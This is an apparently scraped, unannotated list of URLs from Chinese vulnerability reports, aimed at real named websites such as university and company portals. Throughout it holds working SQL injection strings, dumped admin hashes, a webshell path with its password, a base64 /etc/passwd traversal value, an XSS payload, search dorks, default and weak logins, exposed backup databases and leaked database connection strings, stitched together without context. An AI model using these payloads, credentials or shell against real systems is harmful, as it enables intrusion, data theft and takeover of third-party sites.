http://supports.jiaju.sina.com.cn/api/weibo.php?action=send&type=1&content=%E6%88%91%E6%98%AF%E4%B8%80%E5%8F%AA%E7%8C%AA%EF%BC%9Fhttp://t.cn/RUouNyF%20%20%20%20@ringzero%20&callback=jsonp1446827400881 http://jitochina.com/jitochina.rar https://sms-api.luosimao.com/v1/send.json http://www.kuaidi100.com/poll http://biolab.ecnu.edu.cn/admin/sydetail/index2.asp?id=103&ProjectID=X00099 http://jingjia.ecnu.edu.cn Able.Acc2.Web/Page_TeachFiles.aspx http://able.ecnu.edu.cn http://**.**.**.**/cms/member/login.jsp http://www.rycard.com/list.php?catid=35&gid=0&cid=1&tid=3* http://**.**.**.**/plugins/book/1/index.jsp?parentID=500020 http://**.**.**.**/article-exp.php?category=10 
http://**.**.**.**/article-exp.php?category=10%20and%20length%28user%28%29%29=17 http://gitlab.mindai.com:1080/script http://qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/introduce.aspx?style=%C1%AA%CF%B5%CE%D2%C3%C7&type=%BC%F2%BD%E9 http://www.hy.zjut.edu.cn/ListArticle.aspx?keyword=1&select=http://www.zskjj.gov.cn/&sou=1&tid=1001 http://fw.qm.cn/newslook.asp?leibie=3&id=-1 http://119.15.138.51:80/.svn/entries https://www.ohwyaa.com https://portal.neusoft.com http://**.**.**.**/perform_qpdj2.aspx?jw=280.00&m=0.23174629407003522&vM_ycbh=*&ycsj=2015/12/29 admin:admin http://**.**.**.**:8077/ http://www.willshop.cn/productdetail.php?id=822 http://www.willshop.cn/productdetail.php?id=822 http://jfcc.faw.com.cn/pub_yz.jsp http://jfcc.faw.com.cn http://**.**.**.**/member_lookorder.asp?oid=555 http://**.**.**.**/member_order.asp?type=del&id=554 http://**.**.**.**:16929/SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45 http://**.**.**.**/ http://**.**.**.**/ http://www.qks.zjut.edu.cn/ShowSinglePageAction.do?singlepageID=35 inurl:webquery_login.asp http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-077489 https://**.**.**.**/cgi-bin/madmin.cgi https://**.**.**.**/cgi-bin/madmin.cgi http://loginvpc.baijiahulian.com/ http://**.**.**.**/phpcms/modules/video/templates/video_stats_init.tpl.php www.hotwater.com.cn http://www.hotwater.com.cn/project_index.aspx www.hotwater.com.cn http://**.**.**.**/bugs/wooyun-2010-0105315 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ https://**.**.**.**/owa/auth/logon.aspx http://fx1.zgdygf.com/ http://**.**.**.**/web4/findmm.asp^action=find&B1=提交&__EVENTVALIDATION=/wEWBALjoKqRBgL3qvuWAgKF6q0rAt7v5u0M6X2eNnMBcge+ZiVOwRwCJigxFWk=&sfzh=99999999 http://gdiv.sdu.edu.cn:8080/ cn:8080 http://oa.yonho.com/yyoa/index.jsp,这里可用常用用户名和弱口令123456撞库获取7个账号,登陆后可查看公司通讯录,查看办理事宜,可上传脚本。 http://oa.yonho.com/yyoa/common/js/menu/test.jsp?doType=101&S1=;任意执行SQL语句,dbs权限,可getshell。 
http://**.**.**.**/smkx/newsopen.php?id=184 http://www.soft.zjut.edu.cn www.soft.zjut.edu.cn http://**.**.**.**/sri/htm/news_show.asp?id=110 http://**.**.**.**/sri/htm/news_show.asp?id=110 http://www.freshman.fudan.edu.cn www.freshman.fudan.edu.cn http://www.17ugo.com/brand_com.php?id=1049&page=2 http://alumni1.xmu.edu.cn/Enrol.aspx http://alumni1.xmu.edu.cn/Assoc/AssocQuery.aspx www.sinoflt.com http://**.**.**.**/oa/default.asp http://**.**.**.**/c/about_mgt_details.php?id=12097 http://ime.xmu.edu.cn/facilityfile.asp?id=11 http://**.**.**.**/english/products/products.asp?leibieid=APIs http://**.**.**.**/products/products.asp?leibieid=APIs&page_no=2 http://**.**.**.**/simcere.rar www.dfsszc.com http://ci.hotwater.com.cn//ci/apps/sys/AccountAction.do?method=selectEmpInfoById&emp_Id=lin www.dfsszc.com http://**.**.**.**/news.asp?sort_name_id=345&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5 http://training.transn.com/training/wcat/app/index.php?task_id=350be7ed-48a5-91b6-92be-54bb07ba2474 http://**.**.**.**/mmcnews/latest.php?sortid=-1+OR+17-7%3d10 http://**.**.**.**/class.asp?cn=%B6%BE%C6%B7%D6%AA%CA%B6 http://**.**.**.**/ www.51zxw.net/netclass/zl.asp?icid=40 www.51zxw.net/kq/order_v.asp http://tac.ruijie.com.cn/ http://cogsci.xmu.edu.cn/ http://cogsci.xmu.edu.cn/back.rar http://127.0.0.1 http://127.0.0.1 http://cogsci.xmu.edu.cn/a/ http://**.**.**.**/)四处POST型SQL注入。 http://zhongyi.ifeng.com/bianmi/i.aspx http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key http://jyzd.xmu.edu.cn/guestbook.asp http://jyzd.xmu.edu.cn/guestbook.asp data:text/html;base64,PHNjcmlwdD5hbGVydCgiYnkgeW9uZ3NoYW8iKTwvc2NyaXB0Pg== http://so.aipai.com/clickheat/.svn/entries http://**.**.**.**/site3/index.php http://**.**.**.**/admin/ http://**.**.**.**/admin/land.php http://**.**.**.**/admin/login.php http://**.**.**.**/admin/upload.php http://**.**.**.**:7001/defaultroot/login.jsp http://xxx/xxgk/jcms_files/jcms1/web1/site/zfxxgk/ysqgk/que_code.jsp,que_code.jsp代码如下: 
http://**.**.**.**/bugs/wooyun-2014-070117 inurl:/custom/GroupNewsList.aspx http://xxx/library/editornew/Editor/temp.asp http://passport.liba.com/login.htm这个好像就是主站的登录的接口,一开始没有验证码限制的,登录一定错误次数之后验证码就出来了额: http://**.**.**.**/seeyon/ http://euniv.zte.com.cn/ http://**.**.**.**/case_enterprise.html http://**.**.**.**/case_college.html http://**.**.**.**/case_government.html http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://volvo.infolearning.so/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/kl/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/gsedu_admin/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://chrysler.infolearning.so//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 
http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://h.kuwo.cn/hsy/hz/HzWdjNewsDetail?id=14384 http://corp.octmami.com/ajax_video.php?now_video=8'&type=no_type×=0.1655799720901996&_=1445346057351 http://corp.octmami.com/ajax_video.php?now_video=8&type=no_type'×=0.1655799720901996&_=1445346057351 http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- 
http://**.**.**.**/sjk/yxzl/view.asp?ArticleID=6451 http://www.123gps.com.cn/GPSLogin/login.jsp http://**.**.**.**/tesekecheng/index.php/player_tsjy?c_id=1&id=1&PHPSESSID=mnjc6j2e3sh635v2oiphk035d6 http://**.**.**.**/tesekecheng/index.php/player_tsjy?c_id=1&id=1&PHPSESSID=mnjc6j2e3sh635v2oiphk035d6 http://**.**.**.**/member/member.php?username=admin(这个phpcms2007的漏洞,古董) http://**.**.**.**/wooyun.php http://180.168.26.117:8000/8crm/login.php?msg=1 http://jyzd.xmu.edu.cn/dd.rar http://xmubs.xmu.edu.cn/data.rar http://wszg.xmu.edu.cn/admin.rar http://liuxue.xmu.edu.cn/SqlIn.mdb http://cflc.xmu.edu.cn/111.rar http://cflc.xmu.edu.cn/database/PowerEasy2006.mdb http://cflc.xmu.edu.cn/database/SiteWeaver6.5.mdb http://cflc.xmu.edu.cn/temp/PE_TemplateProject.mdb http://phi.xmu.edu.cn/Database/SiteWeaver.mdb http://careersm2.xmu.edu.cn/edit/db/ewebeditor.mdb http://rwxy.xmu.edu.cn/Database/SiteWeaver.mdb http://rwxy.xmu.edu.cn/database/SiteWeaver.mdb http://rwxy.xmu.edu.cn/temp/PE_TemplateProject.mdb http://pmee.xmu.edu.cn/www.rar http://jyzd.xmu.edu.cn/dd.rar http://bst.xmu.edu.cn/KS_Data/KesionCMS7.mdb http://phi.xmu.edu.cn/Database/SiteWeaver.mdb https://**.**.**.** https://**.**.**.** http://info.tcl.com/ http://**.**.**.**/htgl/wzht/mbgl/mbedit.aspx?id=156 http://**.**.**.**/htgl/template/person/csrc/1.aspx http://www.ukimami.com/classroom-uki.php?page=21&item=15 http://www.ukimami.com/product.php?m=product_list&category=10 www.ukimami.com/ajax_product.php?tid=364|10&time=0.7562016532756388 http://**.**.**.**/phpMyAdmin/index.php http://**.**.**.**/phpinfo.php http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 
http://www.0398.info/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://www.europe.ren//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/aspx/ShowRes.aspx?GUID=* http://**.**.**.**/index.php?cmd=aboutUs,如图所示: http://**.**.**.**/index.php?cmd=detail&categoryID=2&publishDate=2014-08-13链接放入sqlmap检测,发现存在注入,如图所示: http://**.**.**.**/index.php?cmd=detail&categoryID=2&publishDate=2014-08-13 http://**.**.**.**/login.php http://**.**.**.**/cl/detail.asp?bigid=11 http://**.**.**.**/info_show.asp?id=31&bigid=5&smallid=16 http://**.**.**.**/alistclass.asp?id=1 http://**.**.**.**/newshow.asp?id=271&mnid=5128%20and%201=1 http://58.83.197.29/zabbix/ http://wooyun.org/bugs/wooyun-2010-066390 http://**.**.**.**/news_page.asp?id=189 http://27.115.100.242/wap/detail/index?goods=2926 http://st.octmami.com/wap/detail/index?goods=2926 http://manage.st.octmami.com/wap/detail/index?goods=2926 http://svn.octmami.com/wap/detail/index?goods=2926 http://test2.st.octmami.com/wap/detail/index?goods=2926 http://test.st.octmami.com/wap/detail/index?goods=2926 http://t.st.octmami.com/wap/detail/index?goods=2926 http://dev.st.octmami.com/wap/detail/index?goods=2926 http://1.st.octmami.com/wap/detail/index?goods=2926 http://3.st.octmami.com/wap/detail/index?goods=2926 http://s2.st.octmami.com/wap/detail/index?goods=2926 
http://st.octmami.com/wap/detail/index?goods=2926 http://202.98.11.185/index.jsp http://www.qks.zjut.edu.cn/admin/Login.do http://www.qks.zjut.edu.cn/gdxsqks/ShowSinglePageAction.do?singlepageID=2,singlepageID参数延时注入 http://www.qks.zjut.edu.cn/Login.do http://www.qks.zjut.edu.cn/ShowSinglePageAction.do?singlepageID=35,singlepageID参数延时注入 https://nav.yhqh.com.cn/.svn/entries http://oa.yhqh.com.cn:8888/weaver/weaver.email.FileDownloadLocation?download=1&fileid=1 http://60.10.8.78/LoginUser http://60.10.8.78 http://www.juran.com.cn/News/NewsList.aspx http://www.jgxy.zjut.edu.cn/info/about*-1.html http://www.metro.com/account/addresslist.aspx?operation=delete&ContactorID= http://uc.danlan.org/admin.php http://www.mba.zjut.edu.cn/cymba/show.php?id=2152 www.rdjt.zjut.edu.cn http://xmsstst1.sinochem.com/vendorlogin.aspx http://**.**.**.**/cct/otherView.asp?id=189 http://tw.codoon.com/.svn/entries http://stat.codoon.com/index http://**.**.**.**/phpmyadmin http://**.**.**.**/jjhs中 http://**.**.**.**/web.zip http://**.**.**.**/rwxy/teachersinfo.php?id=32+and+1=2 http://**.**.**.**/pma/ http://**.**.**.**:8080/admin/login.aspx http://**.**.**.**/sofpro/ext_researchmanage/search1.jsp?code_name=qianj&keyword= http://202.102.62.84:81/infoweb/ http://202.102.62.84:81/phpmyadmin/ http://**.**.**.**/rtidcrm-clientweb/npage/obim/staff/loginmng/initLogin.do http://pl.fh21.com.cn/detail.php?id=876&site=&table=hospital http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- 
http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- 
http://www.**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- 
http://**.**.**.**//livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://120.35.11.138:81 http://120.35.11.138:88 http://120.35.11.138:8080 http://sjmember.feiniu.com/static/html/login.html http://sjmember.feiniu.com http://wl.tudou.com/wl_report/adminUser/wlReportUserlogin.do www.cfb88.com www.cfb88.com http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test 
http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/web/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.kinglin.co/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test 
http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.ruize.info/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/china/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.chaorenpaotui.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 admin:7c6ff7a20019e54878e0 chaorenpaotui:3a5fdc8a052a2441e51e http://www.chaorenpaotui.cn/uploads/allimg/131111/1-131111202436464.php,密码chaoren http://gift.airchina.com.cn/ http://**.**.**.**/hsislyweb/query/queryjindu.hsis?name= http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是1 http://**.**.**.**/ http://www.tio.3gp.fr/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是1 http://**.**.**.**/ http://**.**.**.**/admin/top.asp可以直接进后台查看 http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是a http://www.10086sin.pw/ http://zsyytjfdh.top/admin/top.asp http://**.**.**.**/ http://**.**.**.**/admin/top.asp 
http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/top.asp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** https://github.com/hivencent/TestCase/blob/master/config/Settings.py https://www.wanglibao.com/ https://staging.wanglibao.com/ http://192.168.1.99:8000/ http://www.emaotai.cn/ www.emaotai.cn:90/zyd/Member/HyReg.aspx?khbh=20130523000007&op=2&ReturnPage=HyList2.aspx http://**.**.**.**/ http://**.**.**.**/newsDetail.php?id=35639 http://**.**.**.**/newsDetail.php?id=35639 http://www.enkj.com/jz/casedetails.asp?id=1 inurl:/snspam/homepage.asp http://**.**.**.**/snspam/homepage.asp http://**.**.**.**/snspam/lib/emldata.asp?act=emldata&emlfile=L2V0Yy9wYXNzd2Q%3D http://www.subject.sdu.edu.cn/passage/more1.php?bid=2 http://service.kj.hundsun.com/ https://github.com/fyx912/100code https://github.com/fyx912/100code/blob/bd611918670b68e5266215238d4d8e176002cf3d/100mshCloud/config/config.properties jdbc:mysql://203.195.137.179:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://192.168.40.48:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://106.3.227.246:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 http://176.74.254.135/login/showLoginAction http://x.x.x.x/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**:88/view/srplatform/sysconfig/browser.jsp http://hxlm.xmu.edu.cn http://hxlm.xmu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test 
http://hxlm.xmu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://xxxx/Server/CmxItem.php?pgid=System_UpdateSave http://**.**.**.**/index.php/Index/news/id/19* http://**.**.**.**/admin/index.php/code mail.okcoin.com/crossdomain.xml http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700 http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916689 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916690 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916691 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916692 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916693 http://**.**.**.**/netrep/login.jsp http://**.**.**.**/news_read.aspx?PageType=honor&HorCategory=B&KeyId=00000000000000067053# http://**.**.**.**/tips.php?txtsearch=*&sub=&Language=traditional http://**.**.**.**/about.php?catid=1&Language=traditional inurl:/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://www.oldssdpp.fudan.edu.cn http://www.oldssdpp.fudan.edu.cn/news1.asp?id=1503 